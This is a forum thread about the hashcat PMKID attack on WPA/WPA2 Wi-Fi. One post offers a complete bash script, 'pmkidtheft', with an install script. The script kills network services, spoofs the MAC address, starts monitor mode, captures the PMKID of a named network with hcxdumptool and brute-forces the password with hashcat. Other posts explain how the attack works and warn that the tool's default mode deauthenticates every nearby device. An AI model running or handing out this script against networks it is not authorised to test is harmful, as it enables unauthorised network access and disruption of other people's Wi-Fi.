Jump to content

New WPA/WPA Attack - Hashcat PMKID


Exmix
 Share

Recommended Posts

Tried it, it works.  Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting>

Else it goes after every beacon it hears.  You also have to manually break when you see that status say pownd=1 as it means it has gotten a PMKID.

 

Have to check if there is a param to quit after 1 pmkid is captured for automation.

 

  • Like 1
Link to comment
Share on other sites

  • 2 weeks later...

This is hasty first draft. I scripted this attack. It's 5:20AM here and I haven't slept. (Neighborhood watch) This is most of what you need to get started.

I've included an install script below as well. You'll need to run both as root.

Usage
./pmkidtheft -E <ESSID>

#!/bin/bash



echo "  _____  __  __ _  _______ _____ _______ _    _ ______ ______ _______   "
echo "   |  __ \|  \/  | |/ /_   _|  __ \__   __| |  | |  ____|  ____|__   __|"
echo "   | |__) | \  / | ' /  | | | |  | | | |  | |__| | |__  | |__     | |   "
echo "   |  ___/| |\/| |  <   | | | |  | | | |  |  __  |  __| |  __|    | |   "
echo "   | |    | |  | | . \ _| |_| |__| | | |  | |  | | |____| |       | |   "
echo "   |_|    |_|  |_|_|\_\_____|_____/  |_|  |_|  |_|______|_|       |_|   "
                                                                      
echo "  Automated WPA2 PIMKID cracking tool by Vailixi 2018"

#### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU

#### 

POSITIONAL=()
while [[ $# -gt 0 ]]
do
key="$1"

case $key in



    -h|--help)
    HELP="$2"
    printf "\n"
    echo "	USAGE:"
    echo "	pmkidtheft -E <ESSID>"
    printf "	\n"
    shift # past argument
    shift # past value
    exit 0
    ;;

    -E|--ESSID)
    ESSID="$2"
    shift # past argument
    shift # past value
    ;;
    *)    # unknown option
    POSITIONAL+=("$1") # save it in an array for later
    shift # past argument
    ;;
esac
done
set -- "${POSITIONAL[@]}" # restore positional parameters

if [ $# -eq 0 ]; then
    printf "\n"
    echo "	USAGE:"
    echo "	pmkidtheft.sh -E <ESSID>"
    printf "	\n"
    exit 1
fi

systemctl stop NetworkManager
systemctl stop wpa_supplicant
systemctl stop dhclient
airmon-ng check kill
wifi=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g)
mon=$(ifconfig | grep 'wl' | cut -d ' ' -f 1 | sed s/://g | grep 'mon')
ifconfig $wifi down
macchanger -r $wifi
ifconfig $wifi up
airmon-ng start $wifi
timeout 10 airodump-ng wlan0mon -w wifis --write-interval 5 -o csv
cat wifis.csv | grep  $ESSID | cut -d " " -f 1 | sed s/,//g | sed s/://g > mac.txt
hcxdumptool -o hash -i wlan0mon --filterlist=mac.txt --filtermode=2 --enable_status=3
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force
hashcat -m 16800 /root/hashtocrack -a 3 -w 3 '?u?d?u?d?d65D' --force --show
airmon-ng stop $mon
systemctl start NetworkManager
systemctl start wpa_supplicant
systemctl start dhclient

 

 

#!/bin/bash

#### tool based on this tutorial https://www.youtube.com/watch?v=DarsUXcHTSU

apt-get update -y && apt-get dist-upgrade -y && apt-get install libssl-dev libz-dev libpcap-dev libcurl4-openssl-dev -y
apt-get install opencl -y
apt-get install ocl-icd-opencl-dev -y

git clone https://github.com/ZerBea/hcxdumptool
cd hcxdumptool
make
make install

git clone https://github.com/ZerBea/hcxtools
cd hcxtools
make
make install

git clone https://github.com/hashcat/hashcat
cd hashcat
make
make install
Link to comment
Share on other sites

  • 1 month later...

I'm not sure why the PMKID attacks (and hcxdumptool) are not as well known or discussed as they should be. I know wifi has been done to death but people are still posting questions on the forums about why their deauth attacks aren't working or why they can't capture a 4-way handshake.

To be honest, I didn't know about this attack vector until a week ago myself when I read a post on the hascat forums (refer to link in OP or https://hashcat.net/forum/thread-7717-post-41446.html

I tested hcxdumptool and there are several considerable advantages of using this new method over the “traditional” 4-way handshake approach i.e. sometimes it’s a lot easier to request a single EAPOL frame (with a PMKID) than waiting or forcing a 4-way handshake. Only needing one EAPOL frame also means you can target client-less APs or AP-less clients (refer to link above for details).

Not all vendors/devices are vulnerable because sending the PMKID is optional i.e. EAPOL frames do not need to contain the PMKID for an AP and client to authenticate. It doesn't seem to be a legacy issue - to me it seems that a lot of vendors leave it enabled by default.

There is also no advantage that I can see of using a captured PMKID over a captured 4-way handshake for "cracking purposes" i.e. you will have captured all the crypto values needed but in different ways. You will still have to bruteforce/dictionary attack the key like you normally would with hashcat or JTR. Hashing speeds look similar from my unscientific tests using both modes in hashcat (someone please confirm).

In my opinion, the PMKID attack methods are a great alternative to the traditional 4-way handshake approach (if the device is vulnerable) because they can be less disruptive to the target network/device. I don’t normally advocate automated tools but some of the options of hcxdumptool are definitely worth exploring.

On 8/11/2018 at 11:26 PM, PoSHMagiC0de said:

Tried it, it works.  Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting> 

Else it goes after every beacon it hears.  You also have to manually break when you see that status say pownd=1 as it means it has gotten a PMKID.

 


Agree. Be careful running hcxdumptool first time because default attack mode is very aggressive i.e. it will try all possible attacks (including deauth and disassociate) on any wifi device it picks up in range so use a filter with your device bssids only.

 

 

Link to comment
Share on other sites

  • 3 months later...
  • 5 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...